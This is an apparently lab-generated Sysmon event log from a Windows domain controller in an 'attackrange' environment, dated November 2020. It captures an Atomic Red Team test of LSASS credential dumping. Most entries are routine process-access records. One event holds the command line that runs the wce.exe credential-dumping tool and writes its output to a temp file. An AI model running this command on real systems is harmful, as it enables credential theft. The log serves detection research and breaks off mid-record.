15:52:58.558{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005127Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.558{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005126Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.558{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005125Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.558{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005124Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.558{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005123Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.558{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005122Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.558{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005121Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.558{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005120Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.558{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005119Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.558{D28789B6-7CDA-5FA1-0A01-000000008801}26321344C:\Windows\system32\cmd.exe{D28789B6-7CDA-5FA1-0B01-000000008801}1112C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005118Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.556{D28789B6-7CDA-5FA1-0B01-000000008801}1112C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe-----C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe -o C:\Users\ADMINI~1\AppData\Local\Temp\wce-output.txt C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=BE9387BF647993E501C5D78E49BD4AB5,SHA256=C6333C684762ED4B4129C7F9F49C88C33384B66DFB1F100E459EC6F18526DFF7,IMPHASH=8AB93B061287C79F3088C5BC7E7D97ED{D28789B6-7CDA-5FA1-0A01-000000008801}2632C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe -o %temp%\wce-output.txt" 10341000x80000000000000005117Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.543{D28789B6-7CD9-5FA1-FC00-000000008801}26124136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CDA-5FA1-0A01-000000008801}2632C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAC74C3) 10341000x80000000000000005116Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.543{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CDA-5FA1-0A01-000000008801}2632C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005115Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.543{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005114Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.543{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005113Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.543{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005112Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.543{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005111Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.543{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005110Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.543{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005109Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.543{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005108Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.543{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005107Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.543{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005106Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.543{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CDA-5FA1-0A01-000000008801}2632C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005105Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.543{D28789B6-7CD9-5FA1-FC00-000000008801}26124136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CDA-5FA1-0A01-000000008801}2632C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+100a8850(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd378a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd35fe(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30e55e2a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dcc1e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+318853d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30d949de(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30df2ead(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd63a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dc8328(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758d